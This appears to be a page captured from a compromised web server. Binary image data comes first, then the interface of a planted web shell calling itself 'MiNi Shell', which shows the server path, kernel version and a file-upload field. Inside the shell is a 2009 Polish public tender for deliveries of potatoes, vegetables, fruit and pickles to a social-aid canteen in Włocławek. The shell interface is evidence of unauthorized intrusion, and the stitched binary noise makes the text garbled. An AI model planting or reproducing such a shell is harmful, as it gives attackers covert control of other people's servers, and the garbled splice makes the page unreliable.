JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090401/87594-N-2009.html

<p class="kh_header"><b>Włocławek: Dostawy warzyw i owoców dla Gospodarstwa Pomocniczego przy MOPR we Włocławku (nr. GP.3431-06/2009)</b><br>
<b>Numer ogłoszenia: 87594 - 2009; data zamieszczenia: 01.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gospodarstwo Pomocnicze przy Miejskim Ośrodku Pomocy Rodzinie we Włocławku , ul. Św. Antoniego 11, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4110380, faks 054 4110380.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jadlodajniawloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy warzyw i owoców dla Gospodarstwa Pomocniczego przy MOPR we Włocławku (nr. GP.3431-06/2009).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są dostawy niżej wymienionych warzyw i owoców dla Gospodarstwa Pomocniczego przy MOPR:

Część I zamówienia ( ziemniaki):
a) Ziemniaki - świeże, średniej wielkości, tzn. o przeciętnej średnicy ok. 6 cm, przeciętnej długości ok. 8 cm, jednego gatunku, niemieszane, dopuszczalne odmiany: Irga, Sante, Irys, Bryza, Satina, Lord, jadalne, z 2008r., realizacja dostaw do 1.06.2009r. jednostka miary kilogram, ilość 4.800kg,
b) Ziemniaki - świeże, średniej wielkości, tzn. o przeciętnej średnicy ok. 6 cm, przeciętnej długości ok. 8 cm, jednego gatunku, niemieszane, dopuszczalne odmiany: Irga, Sante, Irys, Bryza, Satina, Lord, jadalne, z 2009r., realizacja dostaw od 1.06.2009r. jednostka miary kilogram, ilość 14.200kg,

Część II zamówienia ( warzywa i owoce): 
a) Marchew - bez naci, świeża, oczyszczona, nieobrana, średniej długości i grubości, tzn. o przeciętnej średnicy od 3 cm do 4 cm i przeciętnej długości od 12 cm do 15 cm, jednostka miary kilogram, ilość 1.800kg,
b) Kapusta czerwona - świeża, w główkach, o minimalnej wadze główki 2,5kg, jednostka miary kilogram, ilość 400kg,
c) Groch łuskany, połówki, jednostka miary kilogram, ilość 400kg,
d) Fasola drobna - biała, jednostka miary kilogram, ilość 500kg,
e) Fasola typu Jaś, duża, jednostka miary kilogram, ilość 550kg,
f) Cebula - świeża, średniej wielkości, tzn. o przeciętnej średnicy od 6 cm, jednostka miary kilogram, ilość 1.700kg,
g) Burak ćwikłowy - średniej wielkości, tzn. o przeciętnej średnicy od 8 cm, jednostka miary kilogram, ilość 2.300kg
h) Nać pietruszki - świeża, o przeciętnej wadze pęczka ok. 100 g, jednostka miary kilogram, ilość 150kg,
i) Koper -  świeży, przeciętna waga pęczka ok. 100 g, jednostka miary kilogram, ilość 250kg,
j) Ogórek zielony - twardy, średniej wielkości, tzn. o przeciętnej długości od 15 cm i przeciętnej średnicy ok. 4 cm, w całości, realizacja dostaw w okresie do 15.07.2009r., jednostka miary kilogram, ilość 60kg,
k) Ogórek zielony - twardy, średniej wielkości, tzn. o przeciętnej długości od 12cm do 15cm i przeciętnej średnicy ok. 4 cm, w całości, realizacja dostaw w okresie od 15.07.2009r., jednostka miary kilogram, ilość 400kg,
l) Papryka surowa, czerwona, świeża, cała, jednostka miary kilogram, ilość 110kg,
m) Pieczarka - świeża, średniej wielkości, tzn. zamknięte kapelusze o przeciętnej średnicy  ok. 5 cm, jednostka miary kilogram, ilość 160kg,
n) Pietruszka korzeń, bez naci, świeża, oczyszczona, nieobrana, średniej długości i grubości, tzn. o przeciętnej średnicy od 3 cm do 4 cm i przeciętnej długości od 12 cm do 15 cm, jednostka miary kilogram, ilość 150kg,
o) Pomidor - świeży, czerwony, cały, średniej wielkości, tzn. o przeciętnej średnicy od 5 cm  do 8 cm, szklarniowy, realizacja dostaw do 31.07.2009r., jednostka miary kilogram, ilość 80kg,
p) Pomidor - świeży, czerwony, cały, średniej wielkości, tzn. o przeciętnej średnicy od 5 cm  do 8 cm, polny, realizacja dostaw od 31.07.2009r., jednostka miary kilogram, ilość 200kg,
q) Por - świeży, oczyszczony, gruby, tzn. o przeciętnej średnicy od 2 cm do 4 cm,  w całości, jednostka miary kilogram, ilość 100kg,
r) Sałata - świeża, cała, o przeciętnej średnicy główki ok.. 22 cm, nie przerośnięta, jednostka miary kilogram, ilość 140kg,
s) Seler - świeży, duży, tzn. o przeciętnej średnicy ok. 12 cm, oczyszczony, bez liści jednostka miary kilogram, ilość 1.000kg,
t) Kapusta włoska - świeża w główkach, o minimalnej wadze główki 1,80 kg, jednostka miary kilogram, ilość 800kg,
u) Jabłka - świeże, całe, średniej wielkości, tzn. o przeciętnej średnicy ok. 8 cm, jednostka miary kilogram, ilość 500kg,
v) Kapusta biała, świeża, w główkach, o minimalnej wadze główki 3 kg, jednostka miary kilogram, ilość 5.600kg,
w) Kapusta pekińska - świeża, w główkach, o minimalnej średnicy 10cm i minimalnej długości 20cm, jednostka miary kilogram, ilość 500kg,
x) Czosnek - w główkach, średniej wielkości, tzn. o przeciętnej średnicy od 3 cm do 5 cm, o przeciętnej wadze główki od 35g do 50g, jednostka miary kilogram, ilość 5kg,
y) Cukinia - twarda, średniej wielkości, tzn. o minimalnej długości 30cm i minimalnej średnicy 8cm. Realizacja dostaw w okresie od 15.07.2009r., jednostka miary kilogram, ilość 700kg.
z) Truskawka- świeża, cała, bez szypułki, średniej wielkości, tzn. o przeciętnej średnicy od 3cm do 4cm, jednego gatunku, nie mieszana, realizacja dostaw od 1.06.2009r., jednostka miary kilogram, ilość 700kg. 

Część III zamówienia ( warzywa kiszone):
a) Kapusta kwaszona - z marchewką, bez konserwantów, jednostka miary kilogram, ilość 2.200kg,
b) Ogórek kiszony - twardy, średniej wielkości, tzn. o przeciętnej długości ok. 12 cm i przeciętnej średnicy ok. 4 cm, w całości, jednostka miary kilogram, ilość 2.000kg.

Jakość wymienionego asortymentu nie może odbiegać od jakości towaru dostępnego w ogólnej sieci handlowej.

2. Wykonawca zapewnia transport WARZYW I OWOCÓW do siedziby zamawiającego na własny koszt, dlatego cena oferty musi zawierać koszty transportu.
3. Transport WARZYW I OWOCÓW musi odbywać się w warunkach spełniających wymogi sanitarno - epidemiologiczne.
4. Miejscem dostaw jest Jadłodajnia przy ul. Św. Antoniego 11 we Włocławku.
5. Ilość WARZYW I OWOCÓW, o których mowa w pkt 1 może ulec zmianie ilościowo o minus 10%.
6. Zamawiający będzie zamawiał określoną partię towaru telefonicznie lub faksem z jednodniowym wyprzedzeniem, najpóźniej do godziny 13:00.
7. Dostawy będą odbywać się sukcesywnie przez okres obowiązywania umowy, ilościowo według zapotrzebowania zamawiającego:
- dla części I i II zamówienia 	- pięć razy w tygodniu, każdorazowo do godz. 8:00 ,
- dla części III zamówienia - dwa razy w tygodniu, każdorazowo do godz. 8:00.
8. Przedmiot zamówienia musi odpowiadać parametrom ilościowym i jakościowym określonym przez zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.00-7, 03.22.13.00-9, 03.22.14.00-0, 03.21.21.00-1, 03.22.11.12-4, 03.22.14.10-3, 03.22.12.20-4, 03.22.12.10-1, 03.22.11.13-1, 03.22.11.11-7, 03.22.12.70-9, 03.22.12.30-7, 03.22.12.40-0, 03.22.13.10-2, 03.22.23.21-9, 03.22.12.50-3, 03.22.23.13-0, 15.33.31.00-7, 15.33.11.40-0, 15.33.11.42-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
1.posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 

Ocenę spełniania warunków udziału w postępowaniu przeprowadzi komisja przetargowa po otwarciu ofert, zgodnie z formułą (spełnia-nie spełnia), w oparciu o informacje zawarte w dokumentach i oświadczeniach zamieszczonych w ofercie.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie Wykonawcy o spełnianiu warunków udziału w  postępowaniu, określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Wykonawcy występujący wspólnie składają takie oświadczenia, każdy osobno.
W przypadku składania oferty na dwie lub trzy części przedmiotu zamówienia Wykonawca winien złożyć ten dokument w jednym egzemplarzu.
2. Odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert, w celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania działalności objętej zamówieniem. Wykonawcy występujący wspólnie składają odpowiedni dokument, każdy osobno.
3. Wykaz wykonanych (minimum jednej), a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia. 
(Przez odpowiednią wartość rozumie się dostawy o wartości co najmniej 50% ceny brutto oferty składanej w niniejszym postępowaniu).       
4. Dokumenty potwierdzające, że dostawy, o których mowa w pkt 3 zostały wykonane należycie (referencje).
5. Wykaz samochodów dostawczych (minimum jeden), jakimi dysponuje lub będzie dysponował wykonawca do realizacji zamówienia.
(Jeżeli wykonawca wskazał w wykazie wyłącznie samochody, którymi będzie dysponował, zobowiązany jest przedstawić pisemne zobowiązanie innych podmiotów do ich udostępnienia.)
6. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, do oferty musi być załączony dokument ustanawiający pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich kopii.
7. Jeśli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 2 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w niniejszym punkcie, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
8. Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych na każdej ze stron za zgodność z oryginałem przez wykonawcę (przez wykonawcę należy rozumieć osobę uprawnioną do reprezentowania wykonawcy na zewnątrz, bądź pełnomocnika)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.jadlodajniawloclawek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gospodarstwo Pomocnicze przy MOPR 
ul. Św. Antoniego 11 
87-800 Włocławek 
BIURO I piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2009 godzina 15:30, miejsce: Gospodarstwo Pomocnicze przy MOPR 
ul. Św. Antoniego 11 
87-800 Włocławek 
BIURO I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca składający ofertę dostarczy dokumenty potwierdzające, że wskazane w ofercie samochody dostawcze spełniają normy sanitarno- epidemiologiczne (zezwolenie, decyzja Państwowej Inspekcji Sanitarnej, Państwowej Inspekcji Weterynaryjnej, itp. na dany samochód lub dokument równoważny wydawany przez podmiot uprawniony do kontroli sanitarno- epidemiologicznej w zakresie, w którym wykonawca składa ofertę.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Ziemniaki - świeże, średniej wielkości, tzn. o przeciętnej średnicy ok. 6 cm, przeciętnej długości ok. 8 cm, jednego gatunku, niemieszane, dopuszczalne odmiany: Irga, Sante, Irys, Bryza, Satina, Lord, jadalne, z 2008r., realizacja dostaw do 1.06.2009r. jednostka miary kilogram, ilość 4.800kg,
b) Ziemniaki - świeże, średniej wielkości, tzn. o przeciętnej średnicy ok. 6 cm, przeciętnej długości ok. 8 cm, jednego gatunku, niemieszane, dopuszczalne odmiany: Irga, Sante, Irys, Bryza, Satina, Lord, jadalne, z 2009r., realizacja dostaw od 1.06.2009r. jednostka miary kilogram, ilość 14.200kg,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Marchew - bez naci, świeża, oczyszczona, nieobrana, średniej długości i grubości, tzn. o przeciętnej średnicy od 3 cm do 4 cm i przeciętnej długości od 12 cm do 15 cm, jednostka miary kilogram, ilość 1.800kg,
b) Kapusta czerwona - świeża, w główkach, o minimalnej wadze główki 2,5kg, jednostka miary kilogram, ilość 400kg,
c) Groch łuskany, połówki, jednostka miary kilogram, ilość 400kg,
d) Fasola drobna - biała, jednostka miary kilogram, ilość 500kg,
e) Fasola typu Jaś, duża, jednostka miary kilogram, ilość 550kg,
f) Cebula - świeża, średniej wielkości, tzn. o przeciętnej średnicy od 6 cm, jednostka miary kilogram, ilość 1.700kg,
g) Burak ćwikłowy - średniej wielkości, tzn. o przeciętnej średnicy od 8 cm, jednostka miary kilogram, ilość 2.300kg
h) Nać pietruszki - świeża, o przeciętnej wadze pęczka ok. 100 g, jednostka miary kilogram, ilość 150kg,
i) Koper -  świeży, przeciętna waga pęczka ok. 100 g, jednostka miary kilogram, ilość 250kg,
j) Ogórek zielony - twardy, średniej wielkości, tzn. o przeciętnej długości od 15 cm i przeciętnej średnicy ok. 4 cm, w całości, realizacja dostaw w okresie do 15.07.2009r., jednostka miary kilogram, ilość 60kg,
k) Ogórek zielony - twardy, średniej wielkości, tzn. o przeciętnej długości od 12cm do 15cm i przeciętnej średnicy ok. 4 cm, w całości, realizacja dostaw w okresie od 15.07.2009r., jednostka miary kilogram, ilość 400kg,
l) Papryka surowa, czerwona, świeża, cała, jednostka miary kilogram, ilość 110kg,
m) Pieczarka - świeża, średniej wielkości, tzn. zamknięte kapelusze o przeciętnej średnicy  ok. 5 cm, jednostka miary kilogram, ilość 160kg,
n) Pietruszka korzeń, bez naci, świeża, oczyszczona, nieobrana, średniej długości i grubości, tzn. o przeciętnej średnicy od 3 cm do 4 cm i przeciętnej długości od 12 cm do 15 cm, jednostka miary kilogram, ilość 150kg,
o) Pomidor - świeży, czerwony, cały, średniej wielkości, tzn. o przeciętnej średnicy od 5 cm  do 8 cm, szklarniowy, realizacja dostaw do 31.07.2009r., jednostka miary kilogram, ilość 80kg,
p) Pomidor - świeży, czerwony, cały, średniej wielkości, tzn. o przeciętnej średnicy od 5 cm  do 8 cm, polny, realizacja dostaw od 31.07.2009r., jednostka miary kilogram, ilość 200kg,
q) Por - świeży, oczyszczony, gruby, tzn. o przeciętnej średnicy od 2 cm do 4 cm,  w całości, jednostka miary kilogram, ilość 100kg,
r) Sałata - świeża, cała, o przeciętnej średnicy główki ok.. 22 cm, nie przerośnięta, jednostka miary kilogram, ilość 140kg,
s) Seler - świeży, duży, tzn. o przeciętnej średnicy ok. 12 cm, oczyszczony, bez liści jednostka miary kilogram, ilość 1.000kg,
t) Kapusta włoska - świeża w główkach, o minimalnej wadze główki 1,80 kg, jednostka miary kilogram, ilość 800kg,
u) Jabłka - świeże, całe, średniej wielkości, tzn. o przeciętnej średnicy ok. 8 cm, jednostka miary kilogram, ilość 500kg,
v) Kapusta biała, świeża, w główkach, o minimalnej wadze główki 3 kg, jednostka miary kilogram, ilość 5.600kg,
w) Kapusta pekińska - świeża, w główkach, o minimalnej średnicy 10cm i minimalnej długości 20cm, jednostka miary kilogram, ilość 500kg,
x) Czosnek - w główkach, średniej wielkości, tzn. o przeciętnej średnicy od 3 cm do 5 cm, o przeciętnej wadze główki od 35g do 50g, jednostka miary kilogram, ilość 5kg,
y) Cukinia - twarda, średniej wielkości, tzn. o minimalnej długości 30cm i minimalnej średnicy 8cm. Realizacja dostaw w okresie od 15.07.2009r., jednostka miary kilogram, ilość 700kg.
z) Truskawka- świeża, cała, bez szypułki, średniej wielkości, tzn. o przeciętnej średnicy od 3cm do 4cm, jednego gatunku, nie mieszana, realizacja dostaw od 1.06.2009r., jednostka miary kilogram, ilość 700kg..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.00-7, 03.22.13.00-9, 03.22.14.00-0, 03.21.21.00-1, 03.22.11.12-4, 03.22.14.10-3, 03.22.12.20-4, 03.22.12.10-1, 03.22.11.13-1, 03.22.11.11-7, 03.22.12.70-9, 03.22.12.30-7, 03.22.12.40-0, 03.22.13.10-2, 03.22.23.21-9, 03.22.12.50-3, 03.22.23.13-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warzywa kiszone.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Kapusta kwaszona - z marchewką, bez konserwantów, jednostka miary kilogram, ilość 2.200kg,
b) Ogórek kiszony - twardy, średniej wielkości, tzn. o przeciętnej długości ok. 12 cm i przeciętnej średnicy ok. 4 cm, w całości, jednostka miary kilogram, ilość 2.000kg..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.31.00-7, 15.33.11.40-0, 15.33.11.42-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com